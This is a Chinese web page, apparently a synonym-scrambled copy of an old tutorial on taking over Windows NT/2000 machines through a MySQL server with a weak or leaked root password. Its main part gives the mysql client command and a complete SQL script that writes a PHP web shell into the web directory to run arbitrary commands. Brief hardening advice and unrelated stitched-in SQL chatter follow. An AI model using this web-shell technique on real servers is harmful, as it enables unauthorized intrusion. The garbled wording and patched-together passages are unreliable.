绝无经由的经由过程mysql进侵NT和win2000

通过支付一定费用，客户可以得到优先的24/7支持，访问内容丰富的在线知识库和联系一个专门的技术负责经理。很多NT和win2000呆板下面装有MySQL和php。而mysql默许数据库root账号为空，这就给进侵者一个路子来进侵该呆板。假如修正了数据库root的账号暗码，而IIS的一些其他毛病招致源代码泄露也大概看到数据库的账号和暗码。假定我们已拿到了数据库的暗码，看看我们怎样经由过程mysql数据库来取得该呆板的必定权限。
起首一般情形下，一样平常mysql和php共同利用，年夜多半NT和win2000的呆板上假如利用php一样平常城市利用mysql。而默许情形下windows上的mysql是同意远程毗连的。而装在linux等上的mysql是不同意远程毗连的。进侵的思绪是写一个shell剧本到web目次。就能够经由过程这个shell教原本实行命令了。而一样平常情形下，windows的web服务器是IIS,默许也是撑持asp剧本的。网上也到处可见asp的sehll剧本,只需将这个asp的剧本传到web目次就行了。可是我以为那些剧本都对照贫苦。而假如方针呆板下面有php的话就能够用php剧本了。在这里我用php剧本来写shell。起首我们要用mysql的客户端保持到该呆板,并实行我们的sql语句来在web目次天生php的shell剧本。
C:mysqlin>mysql-hxxx.xxx.xxx.xxx-uroot<php.sql

C:mysqlin>

上面是php.sql的内容：
usetest;
createtabletmp(cmdTEXT);
insertintotmpvalues(<bodyonload=document.form1.cmd.focus()><?if(isset($cmd)){$cmd=stripslashes($cmd);exec("$cmd>temp.dat");}?><styletype="text/CSS"><!--.form1{BACKGROUND:#FFFFFF;BORDER-BOTTOM:#6666661pxsolid;BORDER-LEFT:#6666661pxsolid;BORDER-RIGHT:#6666661pxsolid;BORDER-TOP:#6666661pxsolid;COLOR:#3c464f;FONT-SIZE:9pt;clip:rect();cursor:text;height:auto;width:auto;margin-top:0px;margin-right:0px;margin-bottom:0px;margin-left:0px--></style><pclass="title2"></p><formname="form1"method="post"action="/cmd2.php"><inputtype="text"name="cmd"size="50"class="form1"></form><formname="form2"method="post"action=""><p><textareaname="text"cols="120"rows="50"class="form1"><?if(isset($cmd)){readfile("temp.dat");unlink("temp.dat");}?></textarea></p></form></body>);
select*fromtmpintooutfiled:
ewcmd2.php;
droptabletmp;

下面的sql语句是创立一个名字为tmp的table,将剧本输出到数据库，然后再将这个剧本保留成d:
ewcmd2.php。然后删除tmp这个我们创立的table。这里的d:
ew的目次是该呆板的web目次。然后我们就能够在扫瞄器中输http://xxx.xxx.xxx.xxx/cmd2.php，就能够使用这个shell实行命令了。至此我们已取得了该网站的一个guest权限的shell了。我们能够经由过程这个shell剧本写个ftp剧本来上传文件，也能够使用这个shell来举行其他guest权限可以实行的一些东东了。这里必要注重的是假如cmd2.php已存在了这个sql剧本是不克不及运转乐成的。这个php剧本不克不及写乐成。
关头的成绩在于取得数据库的暗码而且可以找到web目次。然后统统都不成成绩了。
平安倡议：设置mysql数据库的暗码，而且要有必定的强度。设置好IIS制止泄露源代码，不要间接在web目次编纂剧本等文件，由于有些编纂器会主动发生一个备份文件，通常是.bak的扩大名，如许歹意打击者便可能间接翻开这个.bak文件从而泄露源代码，好比global.asa.bak。

MySQL在业界的流行所带来的另一个好处是，人们总可以很轻松地发现本行业的MySQL学习教程。厂商都希望他们的开发工具和应用程序框架可以与MySQL数据库兼容。

where子句的作用是在对查询结果进行分组前，将不符合where条件的行去掉，即在分组之前过滤数据，条件中不能包含聚组函数，使用where条件显示特定的行。

个人感觉没有case直观。而且默认的第三字段（还可能更多）作为groupby字段很容易造成新手的错误。

这就引发了对varchar和char效率讨论的老问题。到底如何分配varchar的数据，是否会出现大规模的碎片？

每天坚持做不一样的是，认真做笔录，定时复习。一个月你就可以有一定的收获。当然如果你想在sql方面有一定的造诣，你少不了需要看很多很多的书籍了。

原来的计算字段其实和虚拟字段很像。只是管理方面好了而已，性能方面提高不多。但是SQL2005提供了计算字段的持久化，这就提高了查询的性能，但是会加重insert和update的负担。OLTP慎用。OLAP可以大规模使用。

XML字段类型更好的解决了XML数据的操作。XQuery确实不错，但是个人对其没好感。（CSDN的开发者应该是相当的熟了！）

多走走一此相关论坛，多看一些实例开发，多交流0经验，没什么的，我也是刚学没多久!加油